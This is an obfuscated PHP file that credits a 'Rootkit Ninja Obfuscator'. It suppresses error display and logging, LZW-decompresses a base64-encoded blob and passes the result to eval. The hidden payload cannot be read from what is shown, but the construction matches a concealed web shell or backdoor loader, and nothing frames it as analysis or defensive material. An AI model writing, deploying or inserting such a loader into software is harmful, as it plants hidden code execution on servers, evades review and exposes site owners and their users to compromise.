<?php
/**
 * Build ID: 40bb0a36f8796f54a1fab56340d450b1688d3139
 * Date Time: 2025-08-01 21:27:21
 * 
 * This file is auto-generated by the Rootkit Ninja Obfuscator.
 *
 * @author Akari
 * @copyright https://www.rootkit-ninja.com
 * @license MIT
 * @version 1.4.7
 *
 */
error_reporting(0);@ini_set('display_errors','0');@ini_set('html_errors','0');@ini_set('log_errors','0');@clearstatcache();function 
lzw_decompress($Sa){$jc=256;$Ta=8;$kb=array();$Ug=0;$Vg=0;
for($r=0;$r<strlen($Sa);$r++){$Ug=($Ug<<8)+ord($Sa[$r]);$Vg+=8;if($Vg>=$Ta){$Vg-=$Ta;
$kb[]=$Ug>>$Vg;$Ug&=(1<<$Vg)-1;$jc++;if($jc>>$Ta)$Ta++;}}$ic=range("\0","\xFF");$I="";foreach($kb as$r=>$jb){$yc=$ic[$jb];
if(!isset($yc))$yc=$sj.$sj[0];$I.=$yc;if($r)$ic[]=$sj.$yc[0];$sj=$yc;}return$I;}$spada =
lzw_decompress(base64_decode("PB+cDQcAUZTkcjeci+cjKcISdDSbjOKBgKR2ChIdTkbBAPRAIjQdDocDmOheLzObzeZzYZTCZDmLjOLjIbzqYpaYzYaTGaxcbjKdBecDGcxfOp4ax/L40bB7IZGcxKMyCJ
RkRqsRjkYTvMjSdDRNzqc4MYzebjoZbQLrMbazDzeZBgeKzCDedDXXzdETUYS+dzKYjmaDKbDZWTaYYjdZVeL1fDCLoEcBMYx6UhYNsyNTMMBqMxyMhaZhwZDKLRoMRiNxaYhkNxgLRqMTDnTLoBsOByNiKLBMdD
zDh6NBFFxIYzzOjLHY+YxELhEdeeIjl0zZ0y/0zL0zx2unzuMdsUbuYIjN0zT1u90Oz0DP6xEdOx3+mb+mbun8uh2+h+Og/QRDm4qMDsMo0o4jzzPQ9T9vm6A4Om6T/wcETnOg+z+vy+D/Pi6cBOMNw3jSOTywFC
boOrBroDC6Y2wpCwRQwEUOQA/gRO7E4RPbCrpxSEUbRZHLtouMw6jcMaILOEAzKCMY0CqjYUIyjYUhAPYFBBLIQJYN4xDCjjjuSloWBAEjxIjMgSRDEaLy0EA0jMEAUSLI8kjcL4yjwNI5joOYUBOMami/Ao5DmN
KzhOFMqyvN03OONDmUCjYvoir8pKai0sUbLNJDYL6yDoN44DpKUnTIIYqikJgnigKgvikIoqVSJwqCkIInCmIwiswEA6DkOoy0zTdOUFUFRVJR9T1TVdWi+IwniZVYr1WIYgioJInidMlfWAiwQU1TYSIYOaHDcs
jmTC5VSjRYVh06L6dDesl13bTaGDojTyXEMtyLOsk2y0PoQMLc9GWHMIwvJBMghE67oYdGLpjvCkJOpBkdOm88LunCEVRnAdhzfOIUUqL4zqCFARYQ/Eqh6jwThjRMrXBkMyrMtE8jpdE1jkFAt5pmstBOqA4BOj
ofBBn+g6CE4zDeww3juL42DeMYwztowe6QGMyW/peahOxI8IWMoyRGMskDnrOthhruga/oSIDaMqbDptYQBntua7foIu75Rou3rmt937czlo8IEzPHS6NzIM0vrJNObrSPA6cFkM4Tlwly3PlyPceNiyUXv+Q3vf
Ml8gMuAaDgWCOXg24BB0w5X1cfOdV0mA7/1vQ9f3Ms9m8nQX/3eaD6BXj83f3DyXJsnyjKY2UzzMpdt5YQBDl3Ud70c3epOkkUPO88z3PuUjK8Tr0VmeQ/RL8/h+H2jBdMvrcNwXeYLv4SLSNo4BGQO8wOYeQ5sm
KCF9/ocAvtmZ6lV+gRAkqwCGFQJ4UgshfCmEUKAQVbQUCkCB+gJwXBtgIHENgLg5tVDWCd1ajUzIGDYlKBMAExv1X47dy6WiIk6DqaaGQZX/Q0WCDtLLf0jE7DcGuH8QYArea87p44XwvhoS+HReAb3/QBgaDs")
);eval("?>".$spada);
__halt_compiler();
